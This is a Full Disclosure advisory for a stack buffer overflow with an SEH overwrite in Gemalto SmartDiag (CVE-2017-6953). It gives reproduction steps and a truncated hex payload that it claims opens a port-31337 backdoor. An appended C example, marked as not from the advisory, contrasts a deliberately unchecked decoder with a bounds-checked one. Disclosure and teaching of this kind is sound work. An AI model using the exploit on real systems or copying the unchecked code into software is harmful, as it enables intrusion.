Message-ID: <CAPRan0+cecjKXAPdGHrPyKLrp7u6LJyWz7MrKr7v+PcX5PqBtA@mail.gmail.com>
Date: Tue, 9 May 2017 22:48:39 +0300
From: Majid Alqabandi <majid@...host.com>
To: fulldisclosure@...lists.org
Subject: [FD] Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution

# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution
# Date: 16-03-2017
# Software Link: http://support.gemalto.com/index.php?id=download_tools
# Exploit Author: Majid Alqabandi
# Contact: https://www.linkedin.com/in/majidalqabandi/
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.
# Vendor Notified: 17-04-2016


1. Description
SmartDiag.exe is vulnerable to a stack-based buffer overflow that overwrites the SEH chain. In the "Register a new card" dialog, the input fields (the ATR field in the PoC of section 2) are copied into a fixed-size stack buffer without a length check. An overlong value overwrites the structured exception handler record on the stack, and the next exception raised by the process transfers control to the attacker-supplied handler address, which leads to code execution.



2. Proof of Concept

The PoC payload below:
- triggers the overflow and the SEH overwrite,
- executes the embedded shellcode, and
- opens a backdoor listening on port 31337.

To reproduce, start SmartDiag.exe, choose "Register a new card", and enter the
following payload in the ATR field (tested on Windows 7 x64 and Windows 8 x64 with
SmartDiag v2.5):

52834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340
 0052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528
 3400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000
 [remainder of payload not preserved in this archive copy]



3. Solution:
The vendor has been notified and has confirmed the issue; no fix is available
from the vendor yet.
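As an added example (not code from the advisory, from Gemalto, or from SmartDiag itself), the C below shows the bug class behind sections 1 and 2: an ATR hex string decoded into a fixed-size stack buffer with the byte count taken from the input rather than from the buffer, next to a bounds-checked decoder that rejects the PoC pattern outright. It also reads the repeated unit 52 83 40 00 as a little-endian dword, 0x00408352, which is my reading of the payload (an address inside a module based at 0x00400000, the usual base of a non-ASLR main executable), not something the advisory states. ATR_MAX = 33 comes from ISO/IEC 7816-3's limit on ATR length; the assumption that the field is hex-decoded, and all function names, are this example's own.

```c
/*
 * Added example, not code from the advisory or from Gemalto: an ATR
 * hex-string decoder in the shape of the bug described above, with the
 * unchecked version next to a bounds-checked one.
 *
 * Assumptions (not stated on the page): the ATR field is hex-decoded into a
 * fixed-size stack buffer; ATR_MAX is taken from ISO/IEC 7816-3, which
 * limits an ATR to 33 bytes. All function names are this example's own.
 */
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ATR_MAX 33   /* ISO/IEC 7816-3: TS byte plus at most 32 further bytes */

/* Decode one hex digit; returns -1 for a non-hex character. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Vulnerable shape: the byte count comes from the input length and is never
 * compared with sizeof atr, so an overlong hex string walks past atr[] into
 * the saved frame, the return address and the SEH record that sits higher on
 * the stack. Shown for contrast only; never called by the tests. */
void register_card_unchecked(const char *hex)
{
    uint8_t atr[ATR_MAX];
    size_t n = strlen(hex) / 2;
    for (size_t i = 0; i < n; i++) {
        int hi = hexval((unsigned char)hex[2 * i]);
        int lo = hexval((unsigned char)hex[2 * i + 1]);
        atr[i] = (uint8_t)(((hi < 0 ? 0 : hi) << 4) | (lo < 0 ? 0 : lo));
    }
    printf("registered card with %zu-byte ATR\n", n);
}

/* Hardened decoder: the length must be even, non-empty and at most cap bytes,
 * and every character must be a hex digit, before anything is written.
 * Returns the byte count, or -1 on rejection; never writes beyond out[cap]. */
int atr_decode_checked(const char *hex, uint8_t *out, size_t cap)
{
    size_t len = strlen(hex);
    if (len == 0 || len % 2 != 0 || len / 2 > cap)
        return -1;
    for (size_t i = 0; i < len; i += 2) {
        int hi = hexval((unsigned char)hex[i]);
        int lo = hexval((unsigned char)hex[i + 1]);
        if (hi < 0 || lo < 0)
            return -1;
        out[i / 2] = (uint8_t)((hi << 4) | lo);
    }
    return (int)(len / 2);
}

/* Read four bytes as a little-endian 32-bit value, the byte order in which an
 * x86 SEH record (like every other stack-resident pointer) is stored. */
uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Build `reps` repetitions of the advisory's "52834000" unit into dst as a
 * C string. Returns the string length, or 0 if dst is too small. */
size_t build_poc_pattern(char *dst, size_t cap, size_t reps)
{
    static const char unit[] = "52834000";
    if (cap < reps * 8 + 1)
        return 0;
    for (size_t i = 0; i < reps; i++)
        memcpy(dst + i * 8, unit, 8);
    dst[reps * 8] = '\0';
    return reps * 8;
}

int main(void)
{
    uint8_t buf[ATR_MAX];
    char poc[8 * 64 + 1];                     /* 64 units = 512 hex chars = 256 bytes */
    build_poc_pattern(poc, sizeof poc, 64);
    printf("checked decoder on PoC pattern: %d (-1 means rejected as too long)\n",
           atr_decode_checked(poc, buf, sizeof buf));

    uint8_t unit[4];
    atr_decode_checked("52834000", unit, sizeof unit);
    printf("52 83 40 00 read little-endian = 0x%08x\n", le32(unit));
    return 0;
}
```

Compile with `cc -std=c99 atr_check.c` and run. The check the PoC pattern fails is the length comparison against the buffer capacity, so the hardened decoder returns -1 before touching the buffer; a correctly sized ATR such as "3B0A" decodes normally. The unchecked function reproduces the shape of the bug and is deliberately never invoked.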

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
